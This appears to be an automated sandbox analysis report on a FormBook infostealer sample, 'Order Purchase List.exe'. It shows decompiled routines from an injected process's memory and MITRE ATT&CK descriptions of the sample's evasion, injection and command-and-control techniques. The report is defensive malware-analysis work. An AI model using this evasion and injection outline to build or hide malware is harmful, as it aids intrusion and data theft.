Function 02E916E0, Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E916E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E02E91710(0x2f567e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L02E84620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x02e916e8
0x02e916ef
0x02e916f3
0x02e916fe
0x00000000
0x02e91700
0x02e9170d
0x02e9170d
0x02e916f2
0x02e916f2
0x02e916f2
0x02e916f2

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8ffd402566c551fa31e1844b0221b8ecc565b097be3ea6d9bfb2d5d5bde3eea
Instruction ID: eac03f9f0347a7919b5b5990cdeaa17e73afb7196f82f4f147e4efd58115e2bb
Opcode Fuzzy Hash: b8ffd402566c551fa31e1844b0221b8ecc565b097be3ea6d9bfb2d5d5bde3eea
Instruction Fuzzy Hash: 3CD0A73128014256DE2D5B109804B152256DB80789F38505DF20F4D5C1CFB5CCD2E448

Uniqueness

Uniqueness Score: -1.00%

Function 02EE53CA, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02EE53CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E02E7EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x02ee53ca
0x02ee53ce
0x02ee53d9
0x02ee53de
0x02ee53e1
0x02ee53e1
0x02ee53e6
0x02ee53f3
0x00000000
0x02ee53f8
0x02ee53fb

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 23a85dc51f5f63a9edb9f86951fffc20bec8f75dd73763ed4f6e2f41a872e8d8
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: FEE08C319807809BCF12EB88CA50F4EB7F6FB44B08F284044B0095B620C724AC00CB00

Uniqueness

Uniqueness Score: -1.00%

Function 02E7AAB0, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E7AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x02e7aab6
0x02e7aabb
0x02eca442
0x00000000
0x02eca448
0x02eca454
0x02eca454
0x02e7aac1
0x02e7aac1
0x02e7aac6
0x02e7aac6

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: 5fe16f5cafc92ed782422d049dbafe9d3b8566e087d3e4317edf0f73c55d4286
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: 58D0E935392980CFD616CF5DC554B1573A4BB44B48FD554A4E901CB761E73CD945CA00

Uniqueness

Uniqueness Score: -1.00%

Function 02E935A1, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E935A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E02E7EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x02e935a1
0x02e935a1
0x02e935a5
0x02e935ab
0x02e935ab
0x02e935b5
0x00000000
0x02e935c1
0x02e935b7

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: c170f5c9162ecc272b7d50b3684345605422792098ed11c10609d79746fdd2fe
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 72D0C9315D11849ADF51AB60C6287A877B2BB0821CF58B0E7A44646962C33A4A5ADA01

Uniqueness

Uniqueness Score: -1.00%

Function 02E6DB40, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E6DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L02E84620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x02e6db4d
0x02e6db54
0x02e6db5f
0x02e6db56
0x02e6db56
0x02e6db5c
0x02e6db5c

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: 38920f9eafdfb3b221f23c8437cff7e2f9ec661ff5fed00fcf5ae3955c498be8
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: F0C08C303C0A02AEEB222F20CD01B1036A1BB40B49F8440A07304DA0F0EB78D801EA00

Uniqueness

Uniqueness Score: -1.00%

Function 02EEA537, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02EEA537(intOrPtr _a4, intOrPtr _a8) {

				return L02E88E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x02eea553

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: 77b28a103a2c05bcd012e14870f7a5c330d1348cddd17c4732b125274fabc5a3
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: 7DC01237080248BBCB12AE81CC00F067B2AFB94B60F008010BA480A5608632E970EA84

Uniqueness

Uniqueness Score: -1.00%

Function 02E83A1C, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E83A1C(intOrPtr _a4) {
				void* _t5;

				return L02E84620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x02e83a35

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: 692e6cdea60e5bb12b064a0e2238283271b5d86375e00017e564e02692c62dfd
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: 12C08C32080248BBC7126E41DC00F017B2AE790B60F004020B6080A5A08632EC60E988

Uniqueness

Uniqueness Score: -1.00%

Function 02E776E2, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E776E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x02e776e4
0x00000000
0x02e776f8
0x02e776fd

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: 31507d695b71d61abe9f6b7d2b4f66e8ace3f4a79b27924ff9150fe0a1f6966d
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: ACC08C741C11805AEB2A6748CE20B20B650AB0870DF58619CBB49094A1C369A823C608

Uniqueness

Uniqueness Score: -1.00%

Function 02E936CC, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E936CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L02E84620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x02e936d2
0x02e936e8
0x02e936d4
0x02e936e5
0x02e936e5

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: e97eb802df2afa8b1154d6cdbbd731ad9884280a90c361f9cb2a9f1afe6c0f84
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 7CC02BB01D0440BFDB256F30CD00F147354F700B21F6403D47224454F0E7389C00E500

Uniqueness

Uniqueness Score: -1.00%

Function 02E6AD30, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E6AD30(intOrPtr _a4) {

				return L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x02e6ad49

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 6f530d27a1f02d9b343435fee9f7c9a5ae14ed1da4a6d8932bbef6535e3858f3
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 3EC08C320C0248BBC7126A45CD00F01BB2AE790B60F104020B6080A6618932E860D988

Uniqueness

Uniqueness Score: -1.00%

Function 02E87D50, Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E87D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x02e87d56
0x02e87d5b
0x02e87d60
0x02e87d5d
0x02e87d5d
0x02e87d5d

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 2b3bb25dc5665ef0f3538a69b759c967c16e9678846f210f2cda6f3be2c09bc2
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: 49B092383519408FCE16EF18C080B1573E4BB46A44B9440D0E408CBA60E329E8008900

Uniqueness

Uniqueness Score: -1.00%

Function 02E92ACB, Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E92ACB() {
				void* _t5;

				return E02E7EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x02e92adc

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 93e8925a03c301542fbdf7aa0e8c463e3a01d2b273eba060ecc9d0e13da53659
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 38B01232C50440CFCF12EF40CA20B197772FB00750F0984D1A00127930C228AC01CF40

Uniqueness

Uniqueness Score: -1.00%

Function 02EFFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E02EFFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E02EACE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E02EF5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E02EF5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x02effdda
0x02effde2
0x02effde5
0x02effdec
0x02effdfa
0x02effdff
0x02effe0a
0x02effe0f
0x02effe17
0x02effe1e
0x02effe19
0x02effe19
0x02effe19
0x02effe20
0x02effe21
0x02effe22
0x02effe25
0x02effe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02EFFDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02EFFE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02EFFE01

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: fc01947a88a909c636071b7001bf8651beca0271a6406484b44a95f1c6bb7d4c
Instruction ID: 1dd5ebc54a152aa292aa9ed25a74a259c783f11b23300159d5f5a91f892e1236
Opcode Fuzzy Hash: fc01947a88a909c636071b7001bf8651beca0271a6406484b44a95f1c6bb7d4c
Instruction Fuzzy Hash: DFF0F632680601BFE6601A55DC02F63BF5BEB44730F249315FB285A5D1EAA2F8208AF0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Order Purchase List.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Function 004186A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36
filenativeCOMMON

Function 00409B50, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 004185EA, Relevance: 1.5, APIs: 1, Instructions: 41
filenativeCOMMON

Function 004185F0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Function 004187CA, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Function 004187D0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Function 0041871A, Relevance: 1.5, APIs: 1, Instructions: 21
nativeCOMMON

Function 00418720, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Function 004088E0, Relevance: .1, Instructions: 92
COMMON

Function 004188C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Function 00407313, Relevance: 1.7, APIs: 1, Instructions: 178
threadwindowCOMMON

Function 00407290, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Function 004188F4, Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Function 00418900, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Function 00418A60, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

